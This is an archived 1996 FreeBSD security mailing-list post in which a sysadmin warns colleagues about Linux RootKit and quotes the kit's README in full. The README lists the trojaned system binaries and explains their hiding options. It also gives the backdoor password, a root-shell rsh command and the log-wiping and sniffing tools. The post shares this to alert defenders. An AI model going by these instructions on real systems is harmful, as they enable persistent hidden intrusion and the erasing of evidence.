Skip site navigation (1)Skip section navigation (2) 
Date:      Mon, 16 Sep 1996 20:16:34 +0300 (EET DST)
From:      Seppo Kallio <kallio@beeblebrox.cc.jyu.fi>
To:        freebsd-security@freebsd.org
Subject:   Is Linux RootKit a know packet ?
Message-ID:  <Pine.BSF.3.91.960916200814.22617A-100000@beeblebrox.cc.jyu.fi>
next in thread | raw e-mail | index | archive | help 

We had some cracker using Linux RootKit

I hope the security people working with NetBSD/OpenBSD and FreeBSD know=20
this. And this time, I hope nobody will ever port it to BSD  ;-)

Seppo
kallio@jyu.fi

---

Cybernetik proudly presents...
 _     _                    ____             _   _    _ _     ___ ___
| |   (_)_ __  _   ___  __ |  _ \ ___   ___ | |_| | _(_) |_  |_ _|_ _|
| |   | | '_ \| | | \ \/ / | |_) / _ \ / _ \| __| |/ / | __|  | | | |
| |___| | | | | |_| |>  <  |  _ < (_) | (_) | |_|   <| | |_   | | | |
|_____|_|_| |_|\__,_/_/\_\ |_| \_\___/ \___/ \__|_|\_\_|\__| |___|___| V1.1

=09=09   Released 20/04/96 "It worked perfectly on *MY* system ;)"

UPDATES
1.1=09Fixed login bug (didn't set HISTFILE properly. duh!)

=09Fixed BIG inetd bug. Alright so I forgot to try it with the service=20
=09enabled. Sorry, I found this out the hard way too. (Not that anybody
=09has complained yet :)

=09Included linsniffer, a more practical sniffer.
=20
=09Included wted and lled, two programs I wrote a while ago... the
=09main difference between these and zap is that these actually REMOVE
=09entries leaving no traces.

=09Included bindshell.c coded by Pluvius.

=09Added SHOWFLAG to netstat.

This packages includes the following:

chfn=09=09Trojaned! User->r00t
chsh=09=09Trojaned! User->r00t
inetd=09=09Trojaned! Remote access
login=09=09Trojaned! Remote access
ls=09=09Trojaned! Hide files
du=09=09Trojaned! Hide files
ifconfig=09Trojaned! Hide sniffing
netstat=09=09Trojaned! Hide connections
passwd=09=09Trojaned! User->r00t
ps=09=09Trojaned! Hide processes
top=09=09Trojaned! Hide processes
rshd=09=09Trojaned! Remote access
syslogd=09=09Trojaned! Hide logs
linsniffer=09A kewl sniffz0r!
sniffit=09=09Another kewl sniffer!
fix=09=09File fixer!
z2=09=09Zap2 utmp/wtmp/lastlog eraser!
wted=09=09wtmp/utmp editor!
lled=09=09lastlog editor!
bindshell=09port/shell type daemon!
=09=09
INSTALLATION
To install this kit execute the command 'make all install' from ya # prompt=
.
All of the files/password configuration is in rootkit.h so feel free to
personalise your own version of lrk2 :-) It probably won't compile everythi=
ng
on older systems but thats life. Everything here has been tested on a slack=
ware
3.0 distribution, on other systems there were minor errors but these could =
be
fixed by adding the odd #include or removing the offending code. =20

USAGE
OK I will go thru how to use each program one by one. NOTE when I say passw=
ord
I mean the rootkit password not your users password (doh!). By default the
rootkit password is lrkr0x.

chfn -=09=09Local user->root. Run chfn then when it asks you for a new name
=09=09enter your password.

chsh -=09=09Local user->root. Run chsh when it asks you for a new shell
=09=09enter your password.

inetd -=09 =09Binds a shell to a port for remote access. hehe look at the
=09=09source if u want this one =3D)

login -=09=09Allows login to any account with the rootkit password.
=09=09If root login is refused on your terminal login as "rewt".
=09=09History logging is disabled if you login using your password.

ls -=09=09Trojaned to hide specified files and dirs.
=09=09Default data file is /dev/ptyr.
=09=09All files can be listed with 'ls -/'.
=09=09The format of /dev/ptyr is:
=09=09ptyr
=09=09hack.dir
=09=09w4r3z
=09=09ie. just the filenames. This would hide any files/dirs with the
=09=09names ptyr, hack.dir and w4r3z.

du -=09=09Same as ls, 'cept for du instead :)

ifconfig -=09Modified to remove PROMISC flag when sniffing.

netstat -=09Modified to remove tcp/udp/sockets from or to specified
=09=09addresses, uids and ports.
=09=09default data file: /dev/ptyq
=09=09command 0: hide uid
=09=09command 1: hide local address
=09=09command 2: hide remote address
=09=09command 3: hide local port
=09=09command 4: hide remote port
=09=09command 5: hide UNIX socket path

=09=09example:
=09=090 500           <- Hides all connections by uid 500
=09=091 128.31        <- Hides all local connections from 128.31.X.X
=09=092 128.31.39.20  <- Hides all remote connections to 128.31.39.20
=09=093 8000          <- Hides all local connections from port 8000
=09=094 6667          <- Hides all remote connections to port 6667
=09=095 .term/socket  <- Hides all UNIX sockets including the path=20
=09=09=09=09   .term/socket
=09=09
=09=09Yeah eyem lazy. This is ira's description. Why bother thinking
=09=09up werds when someones already done it?

passwd -=09Local user->root. Enter your rootkit password instead of your
=09=09old password.

ps -=09=09Modified to remove specified processes.
=09=09Default data file is /dev/ptyp.
=09=09An example data file is as follows:
        =090 0             Strips all processes running under root
        =091 p0            Strips tty p0
        =092 sniffer       Strips all programs with the name sniffer
=09=09Don't put in the comments, obviously.

top -=09=09Identical to ps, 'cept for top instead.

rshd -=09=09Execute remote commands as root.=20
=09=09Usage: rsh -l rootkitpassword host command
=09=09ie. rsh -l lrkr0x cert.org /bin/sh -i
=09=09    would start a root shell.

syslogd -=09Modified to remove specified strings from logging.
=09=09I thought of this one when I was on a system which logged
=09=09every connection.. I kept getting pissed off with editing
=09=09files every time I connected to remove my hostname. Then I=20
=09=09thought 'Hey dude, why not trojan syslogd?!' and the rest
=09=09is history. :)
=09=09Default data file is /dev/ptys
=09=09Example data file:
=09=09evil.com
=09=09123.100.101.202
=09=09rshd
=09=09This would remove all logs containing the strings evil.com,
=09=09123.100.101.202 and rshd. Smart! :))

sniffit -=09An advanced network sniffer. This is pretty kewl and has lots
=09=09of filtering options and other stuff. Useful for targetting a
=09=09single host or net. Sniffit uses ncurses.

linsniffer -=09A kewl sniffer. This is smaller than sniffit and doesn't nee=
d
=09=09the ncurses libraries. =20
=09=09As CERT say, sniffing is responsible for more mass network
=09=09breakins than anything else in the 90's. P'raps they ain't
=09=09heard of Sendmail before hahahaha =20

fix -=09=09Replaces and fixes timestamp/checksum infomation on files.
=09=09I modified this a bit for my own uses and to fix a nasty bug
=09=09when replacing syslogd and inetd. The replacement file will
=09=09be erased by fix (unlike other versions). =20

z2 -=09=09Zapper2! Run this to erase the last utmp/wtmp/lastlog entries
=09=09for a username. This can be detected since it just nulls the
=09=09entry out but no sysadmins know this, right?

wted -=09=09This does lots of stuff. U can view ALL the entries in a wtmp
=09=09or utmp type file, erase entries by username or hostname,
=09=09view zapped users (admins use a util similar to this to find
=09=09erased entries), erase zapped users etc.

lled -=09=09Basically the same as wted but for lastlog entries.=20

SOURCES
Some of these patches are derived from the original SunOS rootkit, the ps a=
nd
top patches came from the first linux rootkit by ira. All of the others wer=
e
patched by moi. I patched just about everything I could think of. njoi ;-)

OTHER STUFF
If u wanna send me some email direct it towards na470561@anon.penet.fi.
I welcome all unreleased exploits, passwd files and offers of cash/women :)

If its important then ENCRYPT IT!  My pgp key is:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzCG73gAAAEEAMbBS1Oy56dSvCbKBrPYj9Hz6g9c19bEW09H6+EDuYwjtWIP
b393hPkrbQqGje/kVqaip8uzaN70oyME40V36YU5/VN30yhLUA9XKkw3o00PE4Co
nT/mcN8z+dV69y7+M8lXv50J0FyWfcdAjlYz0NAdiLXG1t0pvvs6puG4V+tRAAUR
tCNDeWJlcm5ldGlrIDxuYTQ3MDU2MUBhbm9uLnBlbmV0LmZpPg=3D=3D
=3Dmh5d
-----END PGP PUBLIC KEY BLOCK-----

Check out these kewl sites:=09ftp://ftp
=09=09=09=09http://ww
=09=09=09=09http://ww
=09=09=09=09http://ww
=09=09=09=09http://un

Lastly, don't rely on just this kit to keep yourself hidden. Learn unix,
learn C, learn how to hack properly rather than just being a kr4d 3l33t
sKr1ptZ h4q3R. This kit won't save you from good logging or active network
monitoring. If you don't understand what this kit does then read the source
code. In short - use yer brain.




Seppo Kallio=09=09=09=09kallio@jyu.fi
Computing Center=09=09=09Fax +358-14-603611
U of Jyv=E4skyl=E4=09=0962.14N 25.44E=09Phone +358-14-603606
PL 35, 40351 Jyv=E4skyl=E4, Finland=09=09http://www.jyu.fi/~kallio

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.91.960916200814.22617A-100000>